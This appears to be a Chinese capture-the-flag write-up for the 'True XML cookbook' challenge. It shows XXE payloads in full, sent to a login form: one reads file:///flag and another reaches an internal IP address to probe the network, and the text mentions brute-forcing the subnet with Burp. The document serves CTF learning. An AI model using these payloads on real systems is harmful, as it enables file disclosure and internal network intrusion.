True XML cookbook

打开题目

看到登录口

随便输入admin,123456,然后抓包试一下

先按原来那道题的payload进行测试,payload和结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "file:///flag">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

未成功获取到flag信息,试着探测内网信息,读取下系统内的配置文件信息看是否能发现有用的信息

这里获得一个新的地址,尝试下进行连接结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "http://10.244.80.49/">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

连接失败,那就查询下同网段内存在不存在其他地址,使用bp的爆破模块进行爆破,设置如下:

扫描可得到flag

相关推荐
六元七角八分15 小时前
pom.xml
xml·数据库
郑重其事,鹏程万里1 天前
commons-digester3(XML解析框架)
xml·java
七牛云行业应用1 天前
实战GPT-5:用“XML三明治”和“完美循环”重构你的提示
xml·gpt·重构
跌入凡尘的张公子1 天前
通过hutool生成xml
xml
optimistic_chen1 天前
【Java EE进阶 --- SpringBoot】Mybatis操作数据库(基础二)
xml·数据库·spring boot·笔记·java-ee·mybatis
Lucky_Turtle3 天前
【Java Xml】Apache Commons Digester3解析
xml·java·apache
莫陌尛.3 天前
xml 方式声明式事务案例
xml
m0_728033133 天前
JavaWeb——(web.xml)中的(url-pattern)
xml·前端
有梦想的攻城狮4 天前
Maven中的settings.xml文件配置详解
xml·java·maven·settings.xml
诸神缄默不语6 天前
Maven用户设置文件(settings.xml)配置指南
xml·java·maven